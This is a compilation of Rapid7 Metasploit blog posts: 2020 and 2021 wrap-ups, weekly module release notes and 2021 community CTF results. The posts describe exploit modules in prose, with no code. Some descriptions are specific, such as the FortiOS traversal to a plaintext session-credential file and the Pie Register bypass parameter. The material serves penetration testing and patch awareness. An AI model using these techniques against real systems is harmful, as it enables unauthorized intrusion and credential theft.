SMB1 has not been enabled by default in Windows 10 since 2017. Last year, Metasploit began the long process of updating the SMB server capabilities to work with the modern SMB 2 and SMB 3 versions. The first milestone allowed the capture server (auxiliary/server/capture/smb) that collects authentication information from incoming client connections to be upgraded to support incoming connections from SMB 2 and SMB 3 clients. Today, the capture server can be used with modern versions for Windows, in their default configuration.

New module highlights

  • exploits/windows/http/exchange_proxylogon_rce – This was the first of two high-profile Exchange RCEs added to Metasploit and highlighted the need for administrators to stay on top of patching their on premises Exchange servers or migrate.
  • exploit/multi/http/git_lfs_clone_command_exec – This exploit brought along with it new capabilities for Metasploit to act as a malicious Git server. This opens the door for future modules to exploit similar vulnerabilities.
  • [exploits/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe])(https://github.com/rapid7/metasploit-framework/pull/15567) eBPF has been a popular target for Linux LPEs this year. This particular exploit, based on @chompie1337’s original research was particularly valuable due to the number of platforms it affected as well as its reliability. Speaking of reliability…
  • exploits/linux/local/sudo_baron_samedit – Being January 2022, this particular celebrity vulnerability seems like old news. At the time, however, it gained quite a bit of attention, as it was in the ever-prevalent sudo utility. One quality that made this exploit particularly valuable was that there is no risk of system instability while exploiting it. This will likely remain a go-to exploit for users needing to escalate on Linux systems in years to come.
    auxiliary/gather/windows_secrets_dump – While not technically a new module, this particular entry saw a massive improvement in its addition of support for targeting Domain Controllers. This was a monumental effort that included a foundation that also makes it easier for modules to run attacks over DCERPC (think PrintNightmare and ZeroLogon).
  • exploit/multi/http/cve_2021_35464_forgerock_openam – Any unauthenticated RCE in an application that’s intended to be an IAM solution is worth calling out.
  • post/windows/gather/credentials/windows_sam_hivenightmare – This was another highly reliable privilege escalation technique that could be used to recover sensitive files on Windows systems. The module’s implementation performs the entire operation in memory using Meterpreter with spawning new processes or dropping artifacts to disk, making it a very stealthy approach.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Congrats to the winners of the 2021 Metasploit community CTF

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2021/12/06/congrats-to-the-winners-of-the-2021-metasploit-community-ctf/

Congrats to the winners of the 2021 Metasploit community CTF

Thanks to everyone that participated in this year’s Metasploit community CTF! Like last year, this CTF ran over the past 4 days and invited community members to solve a series of challenges. This year saw 1,501 users registered across 727 teams. If you participated in the CTF, we have a feedback survey up here:

https://forms.gle/YmMR6Rrk9LCcrXzi8

Congrats to the winners of the 2021 Metasploit community CTF

Place Team Score
1 average ctf enjoyers 1800
2 deadastronauts 1800
3 LeukeTeamNaam 1800
4 PoSTLTimes 1800
5 EvilBunnyWrote 1700
6 BisonSquad 1700
7 Social Engineering Experts 1700
8 B47Sec 1700
9 AlphaSeal 1700
10 L1T 1600
11 APT593 1500
12 IML-SEC 1500
13 NYUSEC 1500
14 Neutrino_Cannon 1500
15 just use bloodhound 1500

We’ll be contacting the captains of the winning teams this week to arrange prize delivery. We want to thank CTFd again for providing the scoreboard software. We also want to thank our partners at TryHackMe for sponsoring prizes for the top 3 teams. Finally, we want to give a huge thank you to everyone that participated in this year’s CTF!

CTF Statistics

  • This year there were 18 total challenges for a maximum possible score of 1800
  • Four teams solved and captured all possible flags
  • The 4-of-hearts challenge had the most solves with 260, while the 7-of-hearts had the fewest at 6 (2.3% of registered teams)
  • A total of 265 teams made it onto the scoreboard
  • There were 1,264 correct challenge submissions and 1,524 incorrect challenge submissions
Challenge Solves
4 of Hearts 260
9 of Diamonds 201
2 of Spades 163
10 of Clubs 92
5 of Diamonds 70
4 of Diamonds 68
Jack of Hearts 61
9 of Spades 59
Ace of Hearts 56
2 of Clubs 48
8 of Clubs 43
3 of Hearts 29
Black Joker 29
5 of Clubs 27
4 of Clubs 18
Ace of Diamonds 18
3 of Clubs 16
7 of Hearts 6

As always, we’re excited to see the different approaches the hacker community took to solve our challenges as detailed in their writeups. There’s a #write-up-links channel dedicated for this in the public Slack workspace that we encourage users to check out.

Metasploit Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2021/12/03/metasploit-wrap-up-141/

Metasploit CTF 2021 starts today

Metasploit Wrap-Up

It’s that time of year again! Time for the 2021 Metasploit Community CTF. Earlier today over 1,100 users in more than 530 teams were registered and opened for participation to solve this year’s 18 challenges. Next week a recap and the winners will be announced, so stay tuned for more information.

Overlayfs LPE

This week Metasploit shipped an exploit for the recent Overlayfs vulnerability in Ubuntu Linux. The exploit works on Ubuntu 14.04 through 20.10, for both the x64 and aarch64 architectures making it very accessible. The vulnerability leverages a lack of verification within the Overlayfs implementation and can be exploited reliably.

Older Exploit Improvements

Community member bcoles made a number of improvements to some older Windows exploits this week. The exploit for MS-03-026 now includes a check method along with modules docs. MS-05-039 was tested and found to be reliable regardless of the target language pack so the target was updated to reflect this. Additionally, MS-07-029 has 13 new targets for different Server 2000 and Server 2003 language packs. This set of improvements will go a long way in helping users test these critical vulnerabilities in older versions of Windows.

New module content (1)

  • 2021 Ubuntu Overlayfs LPE by bwatters-r7 and ssd-disclosure, which exploits CVE-2021-3493 – Adds a module for the CVE-2021-3493 overlay fs local privilege escalation for Ubuntu versions 14.04 – 20.10.

Enhancements and features

  • #15914 from bcoles – This improves upon the exploit/windows/dcerpc/ms03_026_dcom module by adding a check method, documentation, and cleaning up the code.
  • #15915 from bcoles – This renames the Windows 2000 SP4 Languages targets in thems05_039_pnp exploit to Windows 2000 SP4 Universal. It has been tested and was determined to not be language pack dependent.
  • #15918 from bcoles – This adds 13 new language pack-specific targets to the ms07_029_msdns_zonename exploit.
  • #15920 from smashery – This adds tab completion support to the powershell_import command.
  • #15928 from jmartin-r7 – This updates Metasploit Framework’s default Ruby version from 2.7 to 3. There should be no end-user impact.

Bugs fixed

  • #15897 from timwr – This fixes modules that check the return value of write_file() calls by returning a boolean value instead of nil.
  • #15913 from timwr – This fixes handling for shellwords parsing of malformed user-supplied input, such as unmatched quotes, when interacting with command shell sessions.
  • #15917 from smashery – This fixes a tab completion bug in Meterpreter.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2021/11/05/metasploit-wrap-up-137/

GitLab RCE

Metasploit Wrap-Up

New Rapid7 team member jbaines-r7 wrote an exploit targeting GitLab via the ExifTool command. Exploiting this vulnerability results in unauthenticated remote code execution as the git user. What makes this module extra neat is the fact that it chains two vulnerabilities together to achieve this desired effect. The first vulnerability is in GitLab itself that can be leveraged to pass invalid image files to the ExifTool parser which contained the second vulnerability whereby a specially-constructed image could be used to execute code. For even more information on these vulnerabilities, check out Rapid7’s post.

Less Than BulletProof

This week community member h00die submitted another WordPress module. This one leverages an information disclosure vulnerability in the WordPress BulletProof Security plugin that can disclose user credentials from a backup file. These credentials could then be used by a malicious attacker to login to WordPress if the hashed password is able to be cracked in an offline attack.

Metasploit Masterfully Manages Meterpreter Metadata

Each Meterpreter implementation is a unique snowflake that often incorporates API commands that others may not. A great example of this are all the missing Kiwi commands in the Linux Meterpreter. Metasploit now has much better support for modules to identify the functionality they require a Meterpreter session to have in order to run. This will help alleviate frustration encountered by users when they try to run a post module with a Meterpreter type that doesn’t offer functionality that is needed. This furthers the Metasploit project goal of providing more meaningful error information regarding post module incompatibilities which has been an ongoing effort this year.

New module content (3)

  • WordPress BulletProof Security Backup Disclosure by Ron Jost (Hacker5preme) and h00die, which exploits CVE-2021-39327 – This adds an auxiliary module that leverages an information disclosure vulnerability in the BulletproofSecurity plugin for WordPress. This vulnerability is identified as CVE-2021-39327. The module retrieves a backup file, which is publicly accessible, and extracts user credentials from the database backup.
  • GitLab Unauthenticated Remote ExifTool Command Injection by William Bowling and jbaines-r7, which exploits CVE-2021-22204 and CVE-2021-22205 – This adds an exploit for an unauthenticated remote command injection in GitLab via a separate vulnerability within ExifTool. The vulnerabilities are identified as CVE-2021-22204 and CVE-2021-22205.
  • WordPress Plugin Pie Register Auth Bypass to RCE by Lotfi13-DZ and h00die – This exploits an authentication bypass which leads to arbitrary code execution in versions 3.7.1.4 and below of the WordPress plugin, pie-register. Supplying a valid admin id to the user_id_social_site parameter in a POST request now returns a valid session cookie. With that session cookie, a PHP payload as a plugin is uploaded and requested, resulting in code execution.

Enhancements and features

  • #15665 from adfoster-r7 – This adds additional metadata to exploit modules to specify Meterpreter command requirements. Metadata information is used to add a descriptive warning when running modules with a Meterpreter implementation that doesn’t support the required command functionality.
  • #15782 from k0pak4 – This updates the iis_internal_ip module to include coverage for the PROPFIND internal IP address disclosure as described by CVE-2002-0422.

Bugs fixed

  • #15805 from timwr – This bumps the metasploit-payloads version to include two bug fixes for the Python Meterpreter.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2021/03/05/metasploit-wrap-up-101/

FortiOS Path Traversal

Metasploit Wrap-Up

Returning community contributor mekhalleh submitted a module targeting a path traversal vulnerability within the SSL VPN web portal in multiple versions of FortiOS. The flaw is leveraged to read the usernames and passwords of currently logged in users which are stored in plaintext on the file system. This vulnerability is identified as CVE-2018-13379 and can be reliably exploited remotely, without any authentication. Despite the fact that the vulnerability is several years old, CVE-2018-13379 is still known to be exploited in the wild, including in state-sponsored attacks targeting U.S. government agencies and infrastructure.

Additional Module Updates

Two modules received improvements to their targeting capabilities. The ever-popular exploit for MS17-010 was updated by zerosum0x0 (one of the original authors) with an updated fingerprint for properly targeting Windows Storage Server 2008. This allows the exploit module to be used against affected versions of that Server 2008 variant. Additionally, a KarjaSoft Sami FTP exploit was updated by long-time community contributor bcoles who made a number of improvements to it but notably updated the exploit to only rely on an offset within a DLL that is distributed with the vulnerable software. When memory corruption exploits need the address of a POP, POP, RET instruction (as this one does for the SEH overwrite), they are more reliable when referencing one that is distributed with the software and won’t change, unlike libraries that come with the host operating system and are regularly updated.

New Modules (1)

  • FortiOS Path Traversal Credential Gatherer by lynx (Carlos Vieira) and mekhalleh (RAMELLA Sébastien), which exploits a directory traversal vulnerability (CVE-2018-13379) in the SSL VPN web portal of FortiOS 5.4.6 to 5.4.12, FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 to grab the /dev/cmdb/sslvpn_websession file, containing the plaintext list of currently connected usernames and their associated passwords. These credentials can then be saved to the creds database for use in future attacks.

Enhancements and features

  • #14783 from bcoles The KarjaSoft Sami FTP Server v2.0.2 USER Overflow module has been updated with documentation, RuboCop updates, support for the AutoCheck mixin to automatically check if a target is vulnerable, an updated list of authors, as well as improvements to its exploit strategy that allow it to use only one offset within a DLL shipped with the target for exploitation, instead of relying on an Windows OS DLL whose offsets could change as the OS was updated.
  • #14838 from zerosum0x0 The psexec_ms17_010.rb library has been updated to support additionally fingerprinting Windows Storage Server 2008 R2 targets as potentially exploitable targets, thereby allowing users to exploit Windows Storage Server 2008 R2 targets vulnerable to MS17-010.

Bugs Fixed

  • #14816 from dwelch-r7 Ensures that the Faker library is always available for use within modules when generating fake data for bypassing WAF etc.
  • #14821 from space-r7 The search command within Meterpreter has had its logic updated to support searches that start at the root directory, aka /. These types of searches were previously not returning any results due to a logic bug within the code, which has now been fixed.
  • #14840 from dwelch-r7 Removes require rex/ui statement that prevented execution of msfrpc.
  • #14843 from dwelch-r7 With the upgrade to zeitwerk in Metasploit, PseudoShell was not being picked up appropriately, resulting in some modules and tools not being able to load it when needed. A fix has now been applied to make sure that PseudoShell can be appropriately loaded by zeitwerk to prevent missing dependency issues.
  • #14853 from adfoster-r7 Fixes an edge case when upgrading from an older version of Metasploit to Metasploit 6.0.32 when using the Mac Metasploit Omnibus installer directly or indirectly via Brew

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit 2020 Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2020/12/30/metasploit-2020-wrap-up/

Metasploit 2020 Wrap-Up

2020 was certainly an interesting year. There were quite a few newsworthy events and some fantastic exploit content released. Let’s take a look at what 2020 meant for Metasploit.

Quick stats

Some quick statistics for Metasploit’s year.

  • 737 pull requests merged (and counting)
  • A net gain of +179 non-payload modules
  • 50 new Auxiliary modules
  • 134 new Exploit modules
  • 23 new Post modules
  • 2 CTFs hosted
  • 1 new version

Metasploit 6

The Metasploit team released version 6.0 of the framework over the summer. This major change brought quite a few improvements on two fronts: the Meterpreter transport protocol and SMBv3 support for client connections. Both of these offered transport encryption for common operations performed by Metasploit, providing better security for the users. Additionally, to showcase the SMBv3 support, Metasploit added a new module to perform agentless dumping of SAM hashes and LSA secrets (including cached creds) from remote Windows targets. The technique employed by this module has become very popular due to its reliability, and the native integration into the Metasploit Framework makes it easily accessible for users with all the related benefits like database and pivoting support.

CTFs

There were not one but two open CTFs hosted by the Metasploit team in 2020. These events invited the community to solve challenges in a fun and competitive environment. The most recent event included 1,903 users registered across 874 teams.

New module highlights

  • exploit/windows/local/anyconnect_lpe (CVE-2020-3153 & CVE-2020-3433) – This exploit module was an excellent example of a trend of patch bypasses this year. The module is capable of leveraging both the original vulnerability along with the bypass for maximum coverage.
  • exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move (CVE-2020-0787) – This exploit targeted Windows BITS to overwrite a DLL. Exploiting native services included on Windows is always useful, and the technique leveraged here to use the file system operation to obtain code execution was an interesting case.
  • post/multi/gather/enum_software_versions – It’s often important for users to know what is on a system they have compromised. This new module helps make that process simple by enumerating the installed software and their versions, allowing the user to identify interesting entries for exploitation or living-off-the-land techniques.
  • exploit/multi/misc/weblogic_deserialize_badattrval (CVE-2020-2555) – WebLogic is always a valuable target and deserialization vulnerabilities are quite reliable by nature. That combination makes this module particularly useful.
  • exploit/multi/misc/weblogic_deserialize_badattr_extcomp (CVE-2020-2883) – Another more recent WebLogic RCE that makes use of deserialization. Similar to CVE-2020-2555, this module is equally useful.
  • exploit/windows/local/cve_2020_0668_service_tracing (CVE-2020-0668) – Users can never have enough Windows LPE exploits, and this module offered another reliable vector. This module uses a simple DLL-based technique to obtain code execution from a file system operation.

SharePoint

Metasploit added its first exploits for the popular SharePoint platform since 2010. Four exploit modules were added, three leverage XML injection flaws while the fourth targets a server side include. These exploits leverage .NET deserialization to execute operating system commands, avoiding any kind of memory corruption and making exploitation relatively reliable. The .NET deserialization gadgets leveraged by these modules were also new in 2020. This functionality came in the form of a new library that even includes a command line tool for generating gadget chains for researchers.

Over the course of the year, there were some interesting patterns that were observable. In general, there seemed to have been an increase in vulnerabilities that were disclosed and related to an insufficient remediation for a previous vulnerability. These so-called patch bypasses seem to be indicative of the increasing complexity of vulnerabilities and their respective solutions. Additionally, there were multiple exploits added to Metasploit that leveraged vulnerable file system operations to obtain code execution on Windows. These LPEs used a combination of techniques that are becoming increasingly common including op-locks and junctions. Metasploit is working on better support for these primitives to facilitate exploitation of vulnerabilities that use them.

With all that the project accomplished in 2020, the team looks forward to what 2021 will hold. New features are being discussed, and as always, the module pipeline continues to flow. Our sincere gratitude goes to all the members of the community that contributed to the project this year.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

More HaXmas blogs